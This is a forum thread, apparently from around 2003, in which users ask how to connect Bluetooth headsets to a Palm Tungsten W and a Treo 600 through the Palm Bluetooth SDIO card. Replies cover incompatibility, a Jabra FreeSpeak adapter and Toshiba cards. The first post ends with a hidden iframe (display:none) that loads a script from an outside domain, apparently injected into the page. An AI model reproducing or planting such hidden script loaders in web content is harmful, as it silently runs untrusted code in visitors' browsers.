Bluetooth Headset profile for PALM Bluetooth Card

Greetings,

I have a Palm Tungsten W (GPRS/GSM) phone/PDA - also have a Palm Bluetooth 1.1 SDIO card inserted.

Palm DOES NOT profile a Bluetooth headset profile to allow the Bluetooth equipped Palm Tungsten W to recognize/interface with my BlueSpoon (or any other Bluetooth) headset.

Can you please offer some help, for which I, and many others, will be most grateful.

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Treo phone's

I too would like to see the obvious done. I and looking at purchasing a Treo 600 as I am currenlty a Treo 300 user and would like to have a wireless headset for the new phone. I saw an article whereby the writer was using the Palm Bluetooth on a Treo 90; but lacked any information regarding the use of a wireless headset.

Thank You

Jim

Treo 600

Have you found out if it is possible to connect the Treo 600, an SDIO Bluetooth card and a Bluetooth headset?

I am looking to do the same thing so this information would be really useful.

Regards

Richard

Richard and his Treo 600

I found on Handsprings web site that the Palm BT SDIO will NOT work with the Treo 600 and they (Handspring) is unaware of any other BT SDIO available yet for the Treo 600. Their suggestion was to get a hold of a BT manufacturer (I.E. Toshiba) to see if one will be available soon.
I also called Jabra (makers of a good BT headset). They stated that their FreeSpeak 200 for Non-BT phones will work with the Treo 600. Basically the same charging device for the headset clips on your belt and has a 2.5 mm connector to plug into the Treo thereby acting as the BT device for the headset.
By the way, Jabra is comming out with a newer FreeSpeak BT headset that will have much longer talk time (the FreeSpeak 250). It is currently out in Europe but won't be here until March of 04. I'm going to wait and see if someone comes out with at BT SDIO for the Treo 600 between now and then.
Also note: Toshiba just came out with a new BT SDIO for the Windows CE devices that uses less power. I believe they call it the BT SDIO 2. the BT SDIO 1 I beleive is also the one used for Palm BT SDIO. I hope this less power consuming one will be available for the Treo 600 soon.

Thanks

Jim

Re: Re: Bluetooth Headset profile for PALM Bluetooth Card

The TW does not support audio via the Palm Bluetooth SD card. This is documented on Palm's web site.
